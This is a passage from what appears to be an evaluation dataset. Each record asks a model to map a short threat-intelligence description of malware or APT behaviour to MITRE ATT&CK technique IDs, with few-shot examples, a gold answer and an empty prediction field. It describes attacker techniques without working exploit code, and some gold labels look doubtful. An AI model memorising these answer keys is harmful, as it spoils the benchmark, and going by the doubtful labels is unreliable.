MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UNC2452 configured at least one instance of Cobalt Strike to use a network pipe over SMB during the 2020 SolarWinds intrusion.\n\t - T1090.001: Proxy - Internal Proxy\n- Text: leveraged several compromised universities as proxies to obscure its origin.\n\t - T1090: Proxy\n- Text: 1) Send initial proxy module request. The initial request contains the bot ID, external IP address of the infected machine, reverse DNS lookup of the external IP address, internet speed (measured earlier) and seconds since the proxy module started. 2) Establish a connection (proxy commands sequence 1->10->11) with the PROXY-C2. 3) Initialize sessions, perform socks5 authorization with login/password (received from PROXY-C2 with command 10). 4) Begin SOCKS5-like communication wrapped into the QakBot proxy module protocol\n\t - T1090.002: Proxy - External Proxy\n", + "input": "Drovorub can use a port forwarding rule on its agent module to relay network traffic through the client module to a remote host on the same network.", + "gold": "- T1090.001: Proxy - Internal Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: It only installs the second-stage script in the default registry value under the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\sibot. Variant B registers a scheduled task named Sibot and programmed to run daily. This task, which is saved by Windows in the file C:\\Windows\\System32\\Tasks\\Microsoft\\Windows\\WindowsUpdate\\sibot, runs the following command-line daily\n\t - T1112: Modify Registry\n- Text: HermeticWiper has the ability to deploy through an infected system's default domain policy.\n\t - T1484.001: Domain or Tenant Policy Modification - Group Policy Modification\n- Text: Sidewinder has collected stolen files in a temporary folder in preparation for exfiltration.\n\t - T1074.001: Data Staged - Local Data Staging\n", + "input": "Gamaredon Group has removed security settings for VBA macro execution by changing registry values \"HKCU\\Software\\Microsoft\\Office\\<version>\\<product>\\Security\\VBAWarnings\" and \"HKCU\\Software\\Microsoft\\Office\\<version>\\<product>\\Security\\AccessVBOM\".", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly 2.0 modified the Registry to hide create user accounts.\n\t - T1564.002: Hide Artifacts - Hidden Users\n- Text: After this registry change, ShowCompColor and ShowInfoTip keys are also modified to disable the display of compressed and encrypted NTFS files in color. This setting allows you to see compressed files in a blue color\n\t - T1112: Modify Registry\n- Text: FIN4 has created rules in victims' Microsoft Outlook accounts to automatically delete emails containing words such as \u201chacked,\" \"phish,\" and \u201cmalware\" in a likely attempt to prevent organizations from communicating about their activities.\n\t - T1564.008: Hide Artifacts - Email Hiding Rules\n", + "input": "Dragonfly has modified the Registry to hide created user accounts.", + "gold": "- T1564.002: Hide Artifacts - Hidden Users", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The strings pertaining to the ransomware are encrypted and stored in the .bss section of the binary file. This includes the ransom note along with other important information necessary for the ransomware\u2019s tasks. The strings are decrypted using a key that combined the size and raw address of the .bss section, as well as the ransomware\u2019s compilation timestamp\n\t - T1027: Obfuscated Files or Information\n- Text: Bandook is delivered via a malicious Word document inside a zip file.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Elise exfiltrates data using cookie values that are Base64-encoded.\n\t - T1132.001: Data Encoding - Standard Encoding\n", + "input": "Mustang Panda has delivered initial payloads hidden using archives and encoding measures.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.\n\t - T1074.002: Data Staged - Remote Data Staging\n- Text: Aside from the aforementioned executables, the droppers also contained a remote access Trojan (RAT). The RAT executable allows criminals to perform various operations on a host, such as uploading/downloading, executing files, etc\n\t - T1105: Ingress Tool Transfer\n\t - T1547: Boot or Logon Autostart Execution\n- Text: collected complete contents of the 'Pictures' folder from compromised Windows systems.\n\t - T1005: Data from Local System\n", + "input": "ccf32 has copied files to a remote machine infected with Chinoxy or another backdoor.", + "gold": "- T1074.002: Data Staged - Remote Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: (Source: Dell SecureWorks) To facilitate lateral movement, the adversaries deploy ASPXTool web shells to internally accessible systems running IIS\n\t - T1505.003: Server Software Component - Web Shell\n- Text: Kimsuky has manipulated timestamps for creation or compilation dates to defeat anti-forensics.\n\t - T1070.006: Indicator Removal - Timestomp\n- Text: Seasalt uses cmd.exe to create a reverse shell on the infected endpoint.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "SEASHARPEE is a Web shell.", + "gold": "- T1505.003: Server Software Component - Web Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices. Other malware can list a directory's contents.\n\t - T1083: File and Directory Discovery\n- Text: has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.\n\t - T1203: Exploitation for Client Execution\n- Text: Skidmap has used \"pm.sh\" to download and install its main payload.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n", + "input": "APT41 has executed \"file /bin/pwd\" on exploited victims, perhaps to return architecture related information.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: At this time, Janicab is not detected by most anti-virus software, and it slips right past the built-in defenses of Mac OS X in the hands of an unobservant or unsavvy user. Further, seeing other malware using a signed app is troubling, as it may indicate that Gatekeeper will not offer as much security as had been hoped for\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: MegaCortex has used code signing certificates issued to fake companies to bypass security controls.\n\t - T1588.003: Obtain Capabilities - Code Signing Certificates\n- Text: Patchwork has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware.\n\t - T1587.002: Develop Capabilities - Code Signing Certificates\n", + "input": "Metamorfo has digitally signed executables using AVAST Software certificates.", + "gold": "- T1553.002: Subvert Trust Controls - Code Signing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GoldFinder performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n- Text: has a command to get the victim's domain and NetBIOS name.\n\t - T1016: System Network Configuration Discovery\n- Text: APT41 used \"cmd.exe /c\" to execute commands on remote machines.\nAPT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Gamaredon Group has tested connectivity between a compromised machine and a C2 server using Ping with commands such as `CSIDL_SYSTEM\\cmd.exe /c ping -n 1`.", + "gold": "- T1016.001: System Network Configuration Discovery - Internet Connection Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PowerShell Script \u201c58d2a83f777942.26535794.ps1\u201d is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager\n\t - T1027: Obfuscated Files or Information\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Carbanak encrypts the message body of HTTP traffic with RC2 (in CBC mode). Carbanak also uses XOR with random keys for its communications.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: OopsIE compresses collected files with a simple character replacement scheme before sending them to its C2 server.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", + "input": "Carbon encrypts configuration files and tasks for the malware to complete using CAST-128 algorithm.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Execute a remote shell; - Silently start a program on a victim host; - Retrieve a list of processes from the victim host; - Terminate any process; - Upload/Download/Delete files to/from victim host; - Retrieve a list of available drives from the victim host; - Retrieve a filelist of a specified folder from the victim host\n\t - T1105: Ingress Tool Transfer\n\t - T1083: File and Directory Discovery\n- Text: In this case, repotaj.dll, which is ServHelper, will be extracted to %TEMP% and execute with the \u201cfeast\u201d parameter as its export function. Once ServHelper is executed, it runs a PowerShell script to get information from the infected machine\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: All of the bait documents are MHTML ones with malicious macro embedded and the .doc suffix to bypass detection. Below is an example of bait document captured by 360 Threat Intelligence Center in February 2019\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "Zeus Panda can download additional malware plug-in modules and execute them on the victim\u2019s machine.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PoetRAT has the ability to gather information about the compromised host.\n\t - T1082: System Information Discovery\n- Text: Crimson can identify the user on a targeted system.\n\t - T1033: System Owner/User Discovery\n- Text: Analysis of their configurations show that the C2 servers used both fully-qualified domain names and IP addresses\n\t - T1016: System Network Configuration Discovery\n", + "input": "Pisloader has a command to collect victim system information, including the system name and OS version.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: QakBot can identify the user name on a compromised system.\n\t - T1033: System Owner/User Discovery\n- Text: RATANKBA uses the \"net user\" command.\n\t - T1087.001: Account Discovery - Local Account\n- Text: REvil can identify the domain membership of a compromised host.\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n", + "input": "SILENTTRINITY can gather a list of logged on users.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: REvil sends the encrypted stat data containing the host profile and malware information to the C2 URL via the HTTP POST method. Detection of the associated network traffic is challenging because REvil uses the HTTPS protocol, which encrypts the network communication. The malware reads the subsequent C2 server response but implements no logic to act on the received data. Finally, REvil terminates execution\n\t - T1041: Exfiltration Over C2 Channel\n- Text: When a document is found matching one of the extensions in the configuration, uploads it to the C2 server.\n\t - T1020: Automated Exfiltration\n- Text: The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. This file is sent as an attachment to the attacker\u2019s email address. Later variants upload the file to a web server via an HTTP post command. The type of data this implant gathers from the victim\u2019s system\n\t - T1083: File and Directory Discovery\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n", + "input": "Amadey has sent victim data to its C2 servers.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: yty\u201d, the name we use for the framework, from the PDB path string. A \u201cbot id\u201d consisting of computer name, user name, and volume serial number separated by dashes\n\t - T1082: System Information Discovery\n- Text: Egregor has used tools to gather information about users.\n\t - T1033: System Owner/User Discovery\n- Text: The White Company has checked the current date on the victim system.\n\t - T1124: System Time Discovery\n", + "input": "Sys10 collects the computer name, OS versioning information, and OS install date and sends the information to the C2.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The payload contains an exploit for the unpatched local privilege escalation vulnerability CVE-2015-1701 in Microsoft Windows. The exploit uses CVE-2015-1701 to execute a callback in userspace. The callback gets the EPROCESS structures of the current process and the System process, and copies data from the System token into the token of the current process. Upon completion, the payload continues execution in usermode with the privileges of the System process\n\t - T1134.001: Access Token Manipulation - Token Impersonation/Theft\n- Text: has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.\n\t - T1546.008: Event Triggered Execution - Accessibility Features\n- Text: REvil can launch an instance of itself with administrative rights using runas.\n\t - T1134.002: Access Token Manipulation - Create Process with Token\n", + "input": "REvil can obtain the token from the user that launched the explorer.exe process to avoid affecting the desktop of the SYSTEM user.", + "gold": "- T1134.001: Access Token Manipulation - Token Impersonation/Theft", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: It reads and executes commands from a text file stored in Mega cloud storage\n\t - T1530: Data from Cloud Storage\n- Text: The actor's CovalentStealer tool stores collected files on a Microsoft OneDrive cloud folder.\n\t - T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n- Text: P.A.S. Webshell has the ability to list and extract data from SQL databases.\n\t - T1213: Data from Information Repositories\n", + "input": "Fox Kitten has obtained files from the victim's cloud storage instances.", + "gold": "- T1530: Data from Cloud Storage", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When the persistence operation finishes, the loader deletes itself by writing a batch file in the Windows temporary folder with the file name prefix \u2018tmp\u2019 followed by random digits. The batch file content\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Grandoreiro can use MSI files to execute DLLs.\n\t - T1218.007: System Binary Proxy Execution - Msiexec\n- Text: If running with \"root\" permissions, OSX_OCEANLOTUS.D can create a persistence file in the folder \"/Library/LaunchDaemons\".\n\t - T1543.004: Create or Modify System Process - Launch Daemon\n", + "input": "LoudMiner deleted installation files after completion.", + "gold": "- T1070.004: Indicator Removal - File Deletion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Higaisa named a shellcode loader binary \"svchast.exe\" to spoof the legitimate \"svchost.exe\".\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: If installing itself as a service fails, Elise instead writes itself as a file named svchost.exe saved in %APPDATA%\\Microsoft\\Network.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: SombRAT can use a legitimate process name to hide itself.\n\t - T1036: Masquerading\n", + "input": "Meteor has been disguised as the Windows Power Efficiency Diagnostics report tool.", + "gold": "- T1036.004: Masquerading - Masquerade Task or Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The shellcode then creates a string that it uses to create a registry key to automatically run the final payload each time the system starts. It then opens the registry key 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon' and sets the value to the \"Shell\" subkey to the previously created string. Ultimately, the following registry key is created for persistence\n\t - T1547.014: Boot or Logon Autostart Execution - Active Setup\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n- Text: CosmicDuke uses Windows services typically named \"javamtsup\" for persistence.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Some variants of use AppInit_DLLs to achieve persistence by creating the following Registry key: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows \"AppInit_DLLs\"=\"pserver32.dll\"\n\t - T1546.010: Event Triggered Execution - AppInit DLLs\n", + "input": "A Dipsind variant registers as a Winlogon Event Notify DLL to establish persistence.", + "gold": "- T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Hashes For a list of all hashes of malware encountered during this campaign, please refer to the following file\n\t - T1083: File and Directory Discovery\n- Text: During Operation Dust Storm, the threat actors deployed a file called `DeployJava.js` to fingerprint installed software on a victim system prior to exploit delivery.\n\t - T1518: Software Discovery\n- Text: WastedLocker can identify network adjacent and accessible drives.\n\t - T1135: Network Share Discovery\n", + "input": "Kivars has the ability to list drives on the infected host.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When a document is found matching one of the extensions in the configuration, uploads it to the C2 server.\n\t - T1020: Automated Exfiltration\n- Text: PoshC2 contains a module for recursively parsing through files and directories to gather valid credit card numbers.\n\t - T1119: Automated Collection\n- Text: is capable of reading files over the C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "ShimRatReporter gathered information automatically, without instruction from a C2, related to the user and host machine that is compiled into a report and sent to the operators.", + "gold": "- T1119: Automated Collection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: StreamEx obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.\n\t - T1027: Obfuscated Files or Information\n- Text: A Patchwork payload was packed with UPX.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: downloader code has included \"0\" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n", + "input": "Saint Bot has been obfuscated to help avoid detection.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: So far, our telemetry hasn\u2019t provided any concrete evidence that shows us how the Remexi malware spread. However, we think it\u2019s worth mentioning that for one victim we found a correlation between the execution of Remexi\u00b4s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware. This dropper used an FTP with hardcoded credentials to receive its payload\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Use of the non-public PowerShell backdoor previously described by Morphisec and MalwareBytes (which we refer to as POWERSTATS)\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: created a that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory.\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n", + "input": "Kimsuky has used `rundll32.exe` to execute malicious scripts and malware on a victim's network.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Before being sent to the server, the data structure has to pass through shaping as shown in Fig\n\t - T1560: Archive Collected Data\n- Text: In this version, the communication protocol with the C&C server was also upgraded to use AES encryption\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: The implant has the capability of gathering data from the victim\u2019s system. The following information will be gathered and sent to the command and control server\n\t - T1560.002: Archive Collected Data - Archive via Library\n", + "input": "Agent Tesla can encrypt data with 3DES before sending it over to a C2 server.", + "gold": "- T1560: Archive Collected Data", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic. For lateral movement, the malware abuses remote and system administration tools.\n\t - T1539: Steal Web Session Cookie\n\t - T1113: Screen Capture\n\t - T1550.004: Use Alternate Authentication Material - Web Session Cookie\n\t - T1020.001: Automated Exfiltration - Traffic Duplication\n\t - T1056.003: Input Capture - Web Portal Capture\n- Text: File hunting plugin: The most frequently used plugin, similar to one used in 2014. Often used to collect Office files from temporary internet history. Detailed survey plugin: Used to gather domain membership, processes/loaded modules, hardware enumeration, installed products, logical and mapped drive information. Evolution of earlier plugin used in 2014. Browser plugin: Used to steal browser history, stored passwords and sessions. Works with Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex. File listing plugin: Works on local or remote drives and can map additional paths when given credentials\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: Kimsuky has used Google Chrome browser extensions to infect victims and to steal passwords and cookies.\n\t - T1176: Browser Extensions\n", + "input": "Grandoreiro can steal cookie data and credentials from Google Chrome.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BazarLoader is Windows-based malware spread through various methods involving email\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1534: Internal Spearphishing\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n\t - 